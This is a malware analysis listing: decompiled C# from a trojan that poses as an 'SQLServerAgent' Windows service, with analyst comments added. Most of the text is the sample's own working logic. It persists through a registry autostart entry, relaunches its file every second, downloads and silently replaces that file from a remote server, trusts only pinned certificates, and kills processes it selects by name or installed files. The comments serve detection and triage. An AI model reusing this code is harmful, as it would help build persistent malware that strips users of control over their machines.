
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: SQLServerAgent, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 64EBCD24-503A-45A7-A91C-C993E34BC26D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Net;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.ServiceProcess;
using System.Text;
using System.Threading;
using System.Timers;
// ---------------------------------------------------------------------------
// Analyst annotations. The code below is unmodified decompiler output; only
// comments were added.
//
// This type is a Windows service (it derives from ServiceBase). From the
// visible code it:
//   * runs three timers (1 s, 30 s, 60 s) once the service starts;
//   * keeps a registry value under HKLM pointing at a file on the system
//     drive and relaunches that file when no matching process is running;
//   * compares an MD5 of that file with a token fetched over the network and,
//     on mismatch, downloads a replacement into the temp directory and moves
//     it into place;
//   * terminates other processes selected by name, window title, or the
//     presence of particular files next to their executable.
//
// Every string constant is obtained at run time from \u0008.\u0002(int), a
// helper that is not part of this listing. Registry paths, URLs, file names
// and process names therefore cannot be read from this file; the comments
// refer to them by their integer key. Recovering them requires the helper
// class or a dynamic trace.
//
// NOTE(review): member names are obfuscated and several members share a name
// and parameter list and differ only by return type (legal in IL, not in C#).
// Where a call site could bind to more than one of them the comment says so.
// ---------------------------------------------------------------------------
public sealed class \u0005 : ServiceBase
{
// Assigned in OnStart from the static WMI-based hash below; not read anywhere in this listing.
private string \u0002;
// Set to true just before the download worker is started and back to false when it finishes.
private bool \u0003 = false;
// Not referenced by any visible member.
private bool \u0005 = false;
// First '-'-separated field of the text fetched by the parameterless void \u0003(); compared against \u000E.
private string \u0008;
// Not referenced by any visible member.
private string \u0006;
// MD5 hex string of the file at <system drive letter> + key 1356208275 (the file this service launches).
private string \u000E;
// Not referenced by any visible member.
private string \u000F;
// Integer read from a registry value in OnStart; not read anywhere else in this listing.
private int \u0002\u2000;
// String inserted into the middle of both request URLs; empty unless the file checked in \u0008() exists.
private string \u0003\u2000 = string.Empty;
// "Paused" flag: while true the 1 s and 60 s handlers return early.
private bool \u0005\u2000 = false;
// 30-second timer whose handler clears the paused flag.
private System.Timers.Timer \u0008\u2000 = new System.Timers.Timer(30000.0);
// Component container, disposed in Dispose(bool); never assigned in this listing.
private IContainer \u0006\u2000 = (IContainer) null;
// Worker that performs the download-and-replace step (DoWork = \u0003(object, DoWorkEventArgs)).
private BackgroundWorker \u000E\u2000;
// Second worker; its DoWork handler has an empty body and it is never started in this listing.
private BackgroundWorker \u000F\u2000;
// Constructor: delegates to the initializer \u000E() near the end of the class.
public \u0005() => this.\u000E();
// Service start-up. Runs the one-time setup calls, reads an integer from the
// registry, then arms the timers that drive everything else.
protected override void OnStart(string[] _param1)
{
// Chooses the URL fragment \u0003\u2000 depending on whether a marker file exists.
this.\u0008();
// NOTE(review): four parameterless methods are named \u0002 (void, static string, string, bool).
// As a bare statement this is presumably the void one (process kill + registry value/file cleanup) - confirm in IL.
this.\u0002();
// Static overload: MD5 hex string derived from two WMI property values.
this.\u0002 = \u0005.\u0002();
// Fetches the remote token into the field \u0008.
this.\u0003();
// Hashes the local file into the field \u000E.
this.\u0005();
// CreateSubKey opens the HKLM key named by key 1356208489, creating it if it does not exist.
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(\u0008.\u0002(1356208489), RegistryKeyPermissionCheck.ReadWriteSubTree);
// GetValue returns null when the value is missing; the unboxing cast to int then throws
// and, with no handler here, the exception leaves OnStart.
this.\u0002\u2000 = (int) subKey.GetValue(\u0008.\u0002(1356208422));
subKey.Close();
// 1-second timer -> \u0005(object, ElapsedEventArgs): the main watchdog routine.
System.Timers.Timer timer1 = new System.Timers.Timer(1000.0);
timer1.Elapsed += new ElapsedEventHandler(this.\u0005);
timer1.AutoReset = true;
timer1.Enabled = true;
// 30-second timer -> \u0003(object, ElapsedEventArgs): left disabled here, enabled by the watchdog when it pauses.
this.\u0008\u2000.Elapsed += new ElapsedEventHandler(this.\u0003);
this.\u0008\u2000.AutoReset = true;
this.\u0008\u2000.Enabled = false;
// 60-second timer -> \u0002(object, ElapsedEventArgs): re-hashes the local file.
System.Timers.Timer timer2 = new System.Timers.Timer(60000.0);
timer2.Elapsed += new ElapsedEventHandler(this.\u0002);
timer2.AutoReset = true;
timer2.Enabled = true;
}
// Cleanup routine: terminates processes named by key 1356208433, deletes the
// registry value of the same name under the HKLM key named by key 1356208444,
// and deletes a file on the system drive (key 1356208368). Every failure is
// silently ignored by the empty catch.
private void \u0002()
{
try
{
// Presumably binds to the void \u0002(string) overload (kill by process name); a string-returning overload has the same parameters.
this.\u0002(\u0008.\u0002(1356208433));
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(\u0008.\u0002(1356208444), RegistryKeyPermissionCheck.ReadWriteSubTree);
registryKey.DeleteValue(\u0008.\u0002(1356208433));
registryKey.Close();
// Path.GetPathRoot(...)[0] is the first character of the system directory's root, i.e. the drive letter.
System.IO.File.Delete(Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]) + \u0008.\u0002(1356208368));
}
catch
{
}
}
// 60-second timer handler: unless paused, recomputes the hash of the local file (field \u000E).
private void \u0002(object _param1, ElapsedEventArgs _param2)
{
if (this.\u0005\u2000)
return;
this.\u0005();
}
// Returns the MD5 digest of the file at _param1 as a string, one formatted
// chunk per byte. Returns string.Empty when the file does not exist or any
// exception occurs while reading or hashing it.
private string \u0002(string _param1)
{
if (!System.IO.File.Exists(_param1))
return string.Empty;
StringBuilder stringBuilder = new StringBuilder();
try
{
// FileShare.ReadWrite lets the file be hashed while another process has it open for reading or writing.
FileStream inputStream = new FileStream(_param1, FileMode.Open, FileAccess.Read, FileShare.ReadWrite);
byte[] hash = new MD5CryptoServiceProvider().ComputeHash((Stream) inputStream);
inputStream.Close();
// The per-byte format string is key 1356208348 - presumably a two-digit hex format; confirm once decoded.
for (int index = 0; index < hash.Length; ++index)
stringBuilder.Append(hash[index].ToString(\u0008.\u0002(1356208348)));
}
catch
{
return string.Empty;
}
return stringBuilder.ToString();
}
// Fetches text from the URL (key 1356208293) + \u0003\u2000 + (key 1356208257)
// and stores the part before the first '-' in the field \u0008. That field is
// later compared with the local file's MD5, so the response presumably starts
// with the expected hash. Errors are ignored and leave \u0008 unchanged.
private void \u0003()
{
try
{
this.\u0008 = this.\u0003(\u0008.\u0002(1356208293) + this.\u0003\u2000 + \u0008.\u0002(1356208257)).Split('-')[0];
}
catch
{
}
}
// Stores the MD5 of the file at <system drive letter> + key 1356208275 in the field \u000E.
private void \u0005() => this.\u000E = this.\u0002(Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]) + \u0008.\u0002(1356208275));
// Builds a per-host identifier: an MD5 over the concatenation of two WMI
// property values, rendered with the same per-byte format as the file hash.
// The WMI class, object path and property names are encrypted (keys
// 1356208197, 1356208219, 1356208173, 1356208144, 1356208153); the second
// query embeds the system drive letter, so it presumably addresses that
// volume - confirm once decoded. Nothing here catches exceptions.
private static string \u0002()
{
string empty = string.Empty;
// Only the first instance returned by the enumeration is used.
foreach (ManagementObject instance in new ManagementClass(\u0008.\u0002(1356208197)).GetInstances())
{
if (empty == string.Empty)
{
empty = instance.Properties[\u0008.\u0002(1356208219)].Value.ToString();
break;
}
}
string str1 = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
ManagementObject managementObject = new ManagementObject(\u0008.\u0002(1356208173) + str1 + \u0008.\u0002(1356208144));
managementObject.Get();
string str2 = managementObject[\u0008.\u0002(1356208153)].ToString();
byte[] hash = MD5.Create().ComputeHash(Encoding.Default.GetBytes(empty + str2));
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < hash.Length; ++index)
stringBuilder.Append(hash[index].ToString(\u0008.\u0002(1356208348)));
return stringBuilder.ToString();
}
// Requests _param1 and returns the response body decoded as ASCII.
// On any exception: if the URL contains the string for key 1356208293, the
// call is repeated with one substring (key 1356209138) replaced by another
// (key 1356209101); otherwise string.Empty is returned. The replacement looks
// like a fallback scheme or host - confirm once the strings are decoded.
private string \u0003(string _param1)
{
try
{
// ServicePointManager.CertificatePolicy is a static setting, so the nested policy class
// (serial-number allow-list, see the end of this listing) applies to every request in the process.
ServicePointManager.CertificatePolicy = (ICertificatePolicy) new \u0005.\u0002();
StringBuilder stringBuilder = new StringBuilder();
byte[] numArray = new byte[8192];
Stream responseStream = WebRequest.Create(_param1).GetResponse().GetResponseStream();
int count;
// Reads the body in chunks of up to 8192 bytes until Read returns 0.
do
{
count = responseStream.Read(numArray, 0, numArray.Length);
if (count != 0)
{
string str = Encoding.ASCII.GetString(numArray, 0, count);
stringBuilder.Append(str);
}
}
while (count > 0);
responseStream.Flush();
return stringBuilder.ToString();
}
catch
{
return _param1.IndexOf(\u0008.\u0002(1356208293)) != -1 ? this.\u0003(_param1.Replace(\u0008.\u0002(1356209138), \u0008.\u0002(1356209101))) : string.Empty;
}
}
// Terminates every process whose name equals _param1. Exceptions from Kill() are not caught here.
private void \u0002(string _param1)
{
foreach (Process process in Process.GetProcessesByName(_param1))
process.Kill();
}
// If the file named by key 1356209061 exists, sets the URL fragment \u0003\u2000
// to the string for key 1356209033; otherwise the fragment stays empty.
private void \u0008()
{
try
{
if (!System.IO.File.Exists(\u0008.\u0002(1356209061)))
return;
this.\u0003\u2000 = \u0008.\u0002(1356209033);
}
catch
{
}
}
// Reads the whole file named by key 1356209041 and returns its text.
// NOTE(review): no call site in this listing can be attributed to this overload with certainty.
private string \u0002()
{
TextReader textReader = (TextReader) new StreamReader(\u0008.\u0002(1356209041));
string end = textReader.ReadToEnd();
textReader.Close();
return end;
}
// Writes _param2 as one line to the file (key 1356209003) + _param1 + (key 1356209013),
// replacing any existing content, and returns true. No caller is visible in this listing.
private bool \u0002(string _param1, string _param2)
{
TextWriter textWriter = (TextWriter) new StreamWriter(\u0008.\u0002(1356209003) + _param1 + \u0008.\u0002(1356209013));
textWriter.WriteLine(_param2);
textWriter.Close();
return true;
}
// Downloads the resource at _param1 to the file _param2 and returns true on
// success. On any exception it retries once per recursion with a substituted
// URL (key 1356209138 replaced by key 1356208960) when the URL contains the
// string for key 1356208293, and returns false otherwise.
// The written bytes are not checked against any hash or signature here.
private bool \u0003(string _param1, string _param2)
{
try
{
// Same process-wide certificate policy as the text-download overload.
ServicePointManager.CertificatePolicy = (ICertificatePolicy) new \u0005.\u0002();
byte[] buffer = new byte[8192];
Stream responseStream = WebRequest.Create(_param1).GetResponse().GetResponseStream();
// FileMode.OpenOrCreate does not truncate: if _param2 already exists and is longer than the
// download, the old tail remains in the file.
FileStream output = new FileStream(_param2, FileMode.OpenOrCreate);
BinaryWriter binaryWriter = new BinaryWriter((Stream) output);
int count;
do
{
count = responseStream.Read(buffer, 0, buffer.Length);
if (count != 0)
binaryWriter.Write(buffer, 0, count);
}
while (count > 0);
responseStream.Flush();
binaryWriter.Close();
output.Close();
return true;
}
catch
{
return _param1.IndexOf(\u0008.\u0002(1356208293)) != -1 && this.\u0003(_param1.Replace(\u0008.\u0002(1356209138), \u0008.\u0002(1356208960)), _param2);
}
}
// Update check. Refreshes the remote token when it is empty or differs from
// the local file hash; if it is then non-empty and still different, marks an
// update as in progress and starts the download worker with two arguments:
// the download URL and a destination path inside the temp directory.
private void \u0006()
{
if (this.\u0008 != this.\u000E || this.\u0008 == string.Empty)
this.\u0003();
// Equivalent to: continue only when \u0008 != \u000E and \u0008 is not empty.
if (!(this.\u0008 != this.\u000E) || !(this.\u0008 != string.Empty))
return;
this.\u0003 = true;
string tempPath = Path.GetTempPath();
this.\u000E\u2000.RunWorkerAsync((object) new string[2]
{
\u0008.\u0002(1356208985) + this.\u0003\u2000 + \u0008.\u0002(1356208948),
tempPath + \u0008.\u0002(1356208920)
});
}
// Walks every running process and terminates those that match one of two tests:
//   1. the main window title contains either of two strings (keys 1356209645,
//      1356209661) or the executable's file name contains a third (key 1356209614);
//   2. the executable's directory contains every file of any one of the file
//      name sets built below.
// The file name sets identify installed software by the files shipped next to
// its executable; which products are targeted cannot be told without the
// decoded strings. The method is public and has no caller in this listing.
// For triage: a service process terminating unrelated user processes in bulk
// is the observable effect of this routine.
public void \u0005\u2004\u2006\u2009\u2001\u2009\u2009\u2004\u2001\u2001\u2003\u2001\u2008\u2008\u2003\u200A\u2001()
{
string[] strArray1 = new string[1]
{
\u0008.\u0002(1356208871)
};
string[] strArray2 = new string[2]
{
\u0008.\u0002(1356208892),
\u0008.\u0002(1356208846)
};
string[] strArray3 = new string[2]
{
\u0008.\u0002(1356208800),
\u0008.\u0002(1356208815)
};
string[] strArray4 = new string[1]
{
\u0008.\u0002(1356208772)
};
string[] strArray5 = new string[1]
{
\u0008.\u0002(1356208795)
};
string[] strArray6 = new string[1]
{
\u0008.\u0002(1356208758)
};
string[] strArray7 = new string[2]
{
\u0008.\u0002(1356208719),
\u0008.\u0002(1356208735)
};
string[] strArray8 = new string[2]
{
\u0008.\u0002(1356208719),
\u0008.\u0002(1356208688)
};
string[] strArray9 = new string[3]
{
\u0008.\u0002(1356208640),
\u0008.\u0002(1356208655),
\u0008.\u0002(1356208670)
};
// Ten slots but nine distinct sets: strArray1 is listed first and last.
string[][] strArray10 = new string[10][]
{
strArray1,
strArray2,
strArray3,
strArray4,
strArray5,
strArray6,
strArray7,
strArray8,
strArray9,
strArray1
};
foreach (Process process in Process.GetProcesses())
{
// The per-process try/catch skips processes whose MainModule cannot be read and keeps the loop going.
try
{
string directoryName = Path.GetDirectoryName(process.MainModule.FileName);
string fileName = Path.GetFileName(process.MainModule.FileName);
string mainWindowTitle = process.MainWindowTitle;
if (mainWindowTitle.IndexOf(\u0008.\u0002(1356209645)) != -1 || mainWindowTitle.IndexOf(\u0008.\u0002(1356209661)) != -1 || fileName.IndexOf(\u0008.\u0002(1356209614)) != -1)
{
process.Kill();
}
else
{
for (int index1 = 0; index1 < strArray10.Length; ++index1)
{
string[] strArray11 = strArray10[index1];
// flag stays true only if every file of this set exists in the process's directory.
bool flag = true;
for (int index2 = 0; index2 < strArray11.Length; ++index2)
{
string str = strArray11[index2];
// Key 1356209568 sits between directory and file name - presumably the path separator.
if (!System.IO.File.Exists(directoryName + \u0008.\u0002(1356209568) + str))
{
flag = false;
break;
}
}
if (flag)
{
process.Kill();
break;
}
}
}
}
catch
{
}
}
}
// Enumerates processes named by key 1356209576. Any instance that is not
// running from <system drive letter> + key 1356208275, or that runs from
// there but has no main window handle, is terminated. Returns true when at
// least one instance runs from that path and has a main window.
// NOTE(review): no call site in this listing can be attributed to this overload with certainty.
private bool \u0002()
{
string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1356209576));
bool flag = false;
for (int index = 0; index < processesByName.Length; ++index)
{
if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1356208275))
processesByName[index].Kill();
else if (processesByName[index].MainWindowHandle.ToInt32() != 0)
flag = true;
else
processesByName[index].Kill();
}
return flag;
}
// 30-second timer handler: clears the paused flag and disables its own timer.
private void \u0003(object _param1, ElapsedEventArgs _param2)
{
this.\u0005\u2000 = false;
this.\u0008\u2000.Enabled = false;
}
// 1-second timer handler - the watchdog. In order:
//   1. If a trigger file (<drive letter> + key 1356209593) exists, delete it,
//      terminate processes named by key 1356208433, and pause this routine
//      until the 30-second timer fires.
//   2. Make sure the registry value named by key 1356209512, under the HKLM
//      key named by key 1356208444, holds the launched file's path; write it
//      again when it differs.
//   3. Unless an update is already running, perform the update check.
//   4. Terminate processes named by key 1356209576 that run from any other
//      path, and start the file if no instance runs from the expected path.
// For detection: steps 2 and 4 repeat every second, so a removed registry
// value or a terminated process reappears almost at once while the service is
// running. The value's location is consistent with an autostart entry, but the
// key name is encrypted - confirm once decoded.
private void \u0005(object _param1, ElapsedEventArgs _param2)
{
string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
if (System.IO.File.Exists(str + \u0008.\u0002(1356209593)))
{
try
{
System.IO.File.Delete(str + \u0008.\u0002(1356209593));
}
catch
{
}
this.\u0002(\u0008.\u0002(1356208433));
this.\u0005\u2000 = true;
this.\u0008\u2000.Enabled = true;
}
if (this.\u0005\u2000)
return;
// OpenSubKey returns null when the key is missing; the calls inside the try blocks below would
// then throw and be swallowed, while registryKey.Close() further down is outside any try.
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(\u0008.\u0002(1356208444), RegistryKeyPermissionCheck.ReadWriteSubTree);
string empty1 = string.Empty;
string empty2 = string.Empty;
try
{
empty1 = (string) registryKey.GetValue(\u0008.\u0002(1356209512));
}
catch
{
}
try
{
if (empty1 != str + \u0008.\u0002(1356208275))
{
// Besides the value, a subkey with the same name is created; the returned handle is discarded.
registryKey.CreateSubKey(\u0008.\u0002(1356209512));
registryKey.SetValue(\u0008.\u0002(1356209512), (object) (str + \u0008.\u0002(1356208275)));
}
}
catch
{
}
registryKey.Close();
// Skip the process check while a download is in progress, both before and after the update check.
if (this.\u0003)
return;
this.\u0006();
if (this.\u0003)
return;
Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1356209576));
bool flag = false;
for (int index = 0; index < processesByName.Length; ++index)
{
if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1356208275))
processesByName[index].Kill();
else
flag = true;
}
if (flag)
return;
try
{
Process.Start(str + \u0008.\u0002(1356208275));
}
catch
{
}
}
// Empty: stopping the service runs no cleanup code in this class.
protected override void OnStop()
{
}
// Empty DoWork-shaped handler; not attached to any worker in this listing.
private void \u0002(object _param1, DoWorkEventArgs _param2)
{
}
// DoWork handler of the download worker. Argument is a two-element string
// array: [0] the download URL, [1] the temporary destination path.
// After a successful download it terminates processes with the two names
// (keys 1356208433 and 1356209576), waits three seconds, replaces the file at
// <drive letter> + key 1356208275 with the download, and records the remote
// token as the local hash without re-hashing the new file. The in-progress
// flag is cleared whether or not the download succeeded.
private void \u0003(object _param1, DoWorkEventArgs _param2)
{
string[] strArray = (string[]) _param2.Argument;
string str1 = strArray[0];
string sourceFileName = strArray[1];
if (this.\u0003(str1, sourceFileName))
{
// Return value discarded; this call has no effect on the rest of the method.
Path.GetTempPath();
string str2 = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
this.\u0002(\u0008.\u0002(1356208433));
this.\u0002(\u0008.\u0002(1356209576));
// Pause before touching the file, presumably to let the terminated processes release it.
Thread.Sleep(3000);
try
{
if (System.IO.File.Exists(str2 + \u0008.\u0002(1356208275)))
System.IO.File.Delete(str2 + \u0008.\u0002(1356208275));
if (!Directory.Exists(str2 + \u0008.\u0002(1356209527)))
Directory.CreateDirectory(str2 + \u0008.\u0002(1356209527));
System.IO.File.Move(sourceFileName, str2 + \u0008.\u0002(1356208275));
}
catch
{
}
// The local hash is set to the remote token even if the delete/move above failed;
// the 60-second timer recomputes the real hash later.
this.\u000E = this.\u0008;
}
this.\u0003 = false;
}
// Empty DoWork handler attached to the second worker (\u000F\u2000).
private void \u0005(object _param1, DoWorkEventArgs _param2)
{
}
// Standard dispose pattern: releases the component container when disposing managed state.
protected override void Dispose(bool _param1)
{
if (_param1 && this.\u0006\u2000 != null)
this.\u0006\u2000.Dispose();
base.Dispose(_param1);
}
// Initializer called from the constructor: creates both workers, attaches
// their DoWork handlers, and sets the service name from key 1356208604.
private void \u000E()
{
this.\u000E\u2000 = new BackgroundWorker();
this.\u000F\u2000 = new BackgroundWorker();
this.\u000E\u2000.DoWork += new DoWorkEventHandler(this.\u0003);
this.\u000F\u2000.DoWork += new DoWorkEventHandler(this.\u0005);
this.ServiceName = \u0008.\u0002(1356208604);
}
// Certificate policy installed before every web request in this class.
// It accepts a server certificate if, and only if, its serial number string
// equals one of two values (keys 1356208567 and 1356208528). The fourth
// parameter - the problem code the framework passes in - is never read, so
// chain, expiry and name errors do not influence the result.
// For analysis: a TLS-inspecting proxy presents a different certificate, so
// the request is rejected and the callers fall into their catch blocks
// (the URL-substitution retry).
public sealed class \u0002 : ICertificatePolicy
{
public bool CheckValidationResult(
ServicePoint _param1,
X509Certificate _param2,
WebRequest _param3,
int _param4)
{
string serialNumberString = _param2.GetSerialNumberString();
// Equivalent to: serial == key 1356208567 || serial == key 1356208528.
return !(serialNumberString != \u0008.\u0002(1356208567)) || !(serialNumberString != \u0008.\u0002(1356208528));
}
}
}